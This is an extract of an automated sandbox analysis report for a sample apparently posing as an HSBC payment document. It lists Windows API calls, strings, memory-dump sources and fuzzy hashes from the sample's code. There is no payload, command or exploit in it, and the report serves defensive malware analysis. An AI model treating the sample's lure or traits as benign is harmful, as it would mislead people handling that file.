                                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0077AF18
                                                                                                                                • _wcscmp.LIBCMT ref: 0077AF29
                                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0077AF51
                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0077AF6E
                                                                                                                                • _wcscmp.LIBCMT ref: 0077AF8C
                                                                                                                                • _wcsstr.LIBCMT ref: 0077AF9D
                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0077AFD5
                                                                                                                                • _wcscmp.LIBCMT ref: 0077AFE5
                                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0077B00C
                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0077B055
                                                                                                                                • _wcscmp.LIBCMT ref: 0077B065
                                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0077B08D
                                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0077B0F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                                • Opcode ID: cc63a811ef549baf7cc280d4e470a31cca0960740a6e7626a6e5dc2e18e0563e
                                                                                                                                • Instruction ID: 4c45aa07f57c4c3e3536cc16b413316d7501074e7c2f2d16622f1db7c8b3b463
                                                                                                                                • Opcode Fuzzy Hash: cc63a811ef549baf7cc280d4e470a31cca0960740a6e7626a6e5dc2e18e0563e
                                                                                                                                • Instruction Fuzzy Hash: 72819171108309ABEF05DF14C885FAA77E8EF84394F14C56AFD898A096DB38DD45CB61
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 007AC627
                                                                                                                                  • Part of subcall function 007AAB37: ClientToScreen.USER32(?,?), ref: 007AAB60
                                                                                                                                  • Part of subcall function 007AAB37: GetWindowRect.USER32(?,?), ref: 007AABD6
                                                                                                                                  • Part of subcall function 007AAB37: PtInRect.USER32(?,?,007AC014), ref: 007AABE6
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007AC690
                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007AC69B
                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007AC6BE
                                                                                                                                • _wcscat.LIBCMT ref: 007AC6EE
                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007AC705
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007AC71E
                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007AC735
                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 007AC757
                                                                                                                                • DragFinish.SHELL32(?), ref: 007AC75E
                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007AC851
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb~
                                                                                                                                • API String ID: 169749273-781585954
                                                                                                                                • Opcode ID: 239bcfec1ce9d5f81bec01e903672fa85d53661fc33fa230ded142c56a115617
                                                                                                                                • Instruction ID: 12a800ec60491e177c4dde03144e0ca816f1aae6c88fe66ddd75b4f77abeb087
                                                                                                                                • Opcode Fuzzy Hash: 239bcfec1ce9d5f81bec01e903672fa85d53661fc33fa230ded142c56a115617
                                                                                                                                • Instruction Fuzzy Hash: 9F617C71108340EFC705EF64DC89D9BBBE8EFC9310F04492EF595962A1DB38A949CB92
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                                • Opcode ID: f5b7d1056fe1083900e2374b1a0932d5a092eb3bcfb598a7031fcc74aa38810d
                                                                                                                                • Instruction ID: b92be729e7568a3faa2096c577bd914e903ac62e77e7f83003f11ec8353c630d
                                                                                                                                • Opcode Fuzzy Hash: f5b7d1056fe1083900e2374b1a0932d5a092eb3bcfb598a7031fcc74aa38810d
                                                                                                                                • Instruction Fuzzy Hash: 163124B0648215FAEA19EA64EE0BEAE73749F50750F60802AF449711D1FF2D6F04C662
                                                                                                                                APIs
                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00795013
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0079501E
                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00795029
                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00795034
                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 0079503F
                                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0079504A
                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00795055
                                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00795060
                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0079506B
                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00795076
                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00795081
                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0079508C
                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00795097
                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007950A2
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007950AD
                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 007950B8
                                                                                                                                • GetCursorInfo.USER32(?), ref: 007950C8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2577412497-0
                                                                                                                                • Opcode ID: 999fca663521458fcdbdc8a1ba42c65d5223fc9e15ed2088b3a8c09bb0254ba1
                                                                                                                                • Instruction ID: fb5f152190acb833a520054f73b61f310704b89b77a445dec4cb24f1e7eaa232
                                                                                                                                • Opcode Fuzzy Hash: 999fca663521458fcdbdc8a1ba42c65d5223fc9e15ed2088b3a8c09bb0254ba1
                                                                                                                                • Instruction Fuzzy Hash: 7631F2B1D4832DAADF109FB69C8996EBFE8FF04750F50452AE50DE7280DA7CA5008F91
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007AA259
                                                                                                                                • DestroyWindow.USER32(?,?), ref: 007AA2D3
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007AA34D
                                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007AA36F
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007AA382
                                                                                                                                • DestroyWindow.USER32(00000000), ref: 007AA3A4
                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00720000,00000000), ref: 007AA3DB
                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007AA3F4
                                                                                                                                • GetDesktopWindow.USER32 ref: 007AA40D
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 007AA414
                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007AA42C
                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007AA444
                                                                                                                                  • Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                                • Opcode ID: 84acfac6053991f4b3ed73949503ca7e389ee0654ab07f837b751eb8339a5267
                                                                                                                                • Instruction ID: f2bbf96142c8f081a5e2ce28c892ef66ac4110136d245bd515f45d90b27b12c4
                                                                                                                                • Opcode Fuzzy Hash: 84acfac6053991f4b3ed73949503ca7e389ee0654ab07f837b751eb8339a5267
                                                                                                                                • Instruction Fuzzy Hash: DC719A71140245AFDB25DF28CC49F6A7BE5FBCA304F04862DF9858B2A0D778E902CB56
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 007A4424
                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A446F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                                • Opcode ID: 4ad848130150c92541aee4006fc47df3c9ba4b71986a5a58819875216a06a5e1
                                                                                                                                • Instruction ID: ceaaccd0184ec4596d79c726674019bb71a94e198d5a02f3f6c37f7d7e56ff55
                                                                                                                                • Opcode Fuzzy Hash: 4ad848130150c92541aee4006fc47df3c9ba4b71986a5a58819875216a06a5e1
                                                                                                                                • Instruction Fuzzy Hash: CF916B71204711DFCB04EF20C855A6EB7E1AFD6350F088969F9965B3A2CB79ED09CB81
                                                                                                                                APIs
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007AB8B4
                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007A91C2), ref: 007AB910
                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007AB949
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007AB98C
                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007AB9C3
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 007AB9CF
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AB9DF
                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,007A91C2), ref: 007AB9EE
                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007ABA0B
                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007ABA17
                                                                                                                                  • Part of subcall function 00742EFD: __wcsicmp_l.LIBCMT ref: 00742F86
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                                • Opcode ID: 7351cc054d8301d72bd156ef0290f44b2dd66b5c7725a86647c5a538ecdb5a07
                                                                                                                                • Instruction ID: 99cef1117b87f92754f52bc78ad3084ee3d246dbe47a81d99f27e1c006944acc
                                                                                                                                • Opcode Fuzzy Hash: 7351cc054d8301d72bd156ef0290f44b2dd66b5c7725a86647c5a538ecdb5a07
                                                                                                                                • Instruction Fuzzy Hash: 8161EFB1500219FAEB14DFA4CC45FBE77A8EF4A711F108216FA15D61C2DB7CA990DBA0
                                                                                                                                APIs
                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0078DCDC
                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0078DCEC
                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0078DCF8
                                                                                                                                • __wsplitpath.LIBCMT ref: 0078DD56
                                                                                                                                • _wcscat.LIBCMT ref: 0078DD6E
                                                                                                                                • _wcscat.LIBCMT ref: 0078DD80
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078DD95
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDA9
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDDB
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDFC
                                                                                                                                • _wcscpy.LIBCMT ref: 0078DE08
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0078DE47
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                                • Opcode ID: 19fc64340234c6e12d5959e0df57451cc12f4cb5c89be2eafd548d36b6ad3433
                                                                                                                                • Instruction ID: f990a44d64b37af1a3e626707632658932ab7bbe1ff0a4f13a6cef6e0098c110
                                                                                                                                • Opcode Fuzzy Hash: 19fc64340234c6e12d5959e0df57451cc12f4cb5c89be2eafd548d36b6ad3433
                                                                                                                                • Instruction Fuzzy Hash: 65615C725042059FCB20EF60D8489AEB3E8FF89310F04491DF999D7291DB79ED45CB52
                                                                                                                                APIs
                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00789C7F
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00789CA0
                                                                                                                                • __swprintf.LIBCMT ref: 00789CF9
                                                                                                                                • __swprintf.LIBCMT ref: 00789D12
                                                                                                                                • _wprintf.LIBCMT ref: 00789DB9
                                                                                                                                • _wprintf.LIBCMT ref: 00789DD7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                • API String ID: 311963372-3080491070
                                                                                                                                • Opcode ID: 7d281d152416d6a4454b6b4ba63debb05e79bf93d22e97ef350f5eb7a851f58e
                                                                                                                                • Instruction ID: 01604119e69ef808c4e8bc2b331938d5b5f4de55723f98ff2e90136acc257b39
                                                                                                                                • Opcode Fuzzy Hash: 7d281d152416d6a4454b6b4ba63debb05e79bf93d22e97ef350f5eb7a851f58e
                                                                                                                                • Instruction Fuzzy Hash: 5251A271941519EACF18FBE0DE4AEEEB778EF04300F104065F509721A1EB392E48DB65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0078A3CB
                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0078A418
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A460
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A497
                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A4C5
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                                • Opcode ID: a41cbb5a2483a8b57811566658ba086ceb21ddafa4c44a18757340877536eed0
                                                                                                                                • Instruction ID: 6b7816f33bb5c61ea197f1e7428c05c5aaf8f8c679bf99e3eaf3a00581175f15
                                                                                                                                • Opcode Fuzzy Hash: a41cbb5a2483a8b57811566658ba086ceb21ddafa4c44a18757340877536eed0
                                                                                                                                • Instruction Fuzzy Hash: ED518C71104315EFC704EF24D99596AB3F4EF88718F14886EF88A57261DB39ED0ACB92
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0075E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0077F8DF
                                                                                                                                • LoadStringW.USER32(00000000,?,0075E029,00000001), ref: 0077F8E8
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0075E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0077F90A
                                                                                                                                • LoadStringW.USER32(00000000,?,0075E029,00000001), ref: 0077F90D
                                                                                                                                • __swprintf.LIBCMT ref: 0077F95D
                                                                                                                                • __swprintf.LIBCMT ref: 0077F96E
                                                                                                                                • _wprintf.LIBCMT ref: 0077FA17
                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0077FA2E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                                • Opcode ID: 9e15ec3fc52e519b523fbce308ff33c655ec9ed749aaaa6c45c0a5fb6d4ffea3
                                                                                                                                • Instruction ID: bc4deef65f8ccdcad6c015434f79d8c69538e120cf1bb50fae4dac4d41849746
                                                                                                                                • Opcode Fuzzy Hash: 9e15ec3fc52e519b523fbce308ff33c655ec9ed749aaaa6c45c0a5fb6d4ffea3
                                                                                                                                • Instruction Fuzzy Hash: 15413F72904119EACF08FFE0DE8ADEE7778AF15340F104465F509B6091EA396F49CB61
                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007A9207,?,?), ref: 007ABA56
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA6D
                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA78
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA85
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 007ABA8E
                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA9D
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 007ABAA6
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABAAD
                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABABE
                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,007B2CAC,?), ref: 007ABAD7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 007ABAE7
                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007ABB0B
                                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007ABB36
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 007ABB5E
                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007ABB74
                                                                                                                                Memory Dump Source
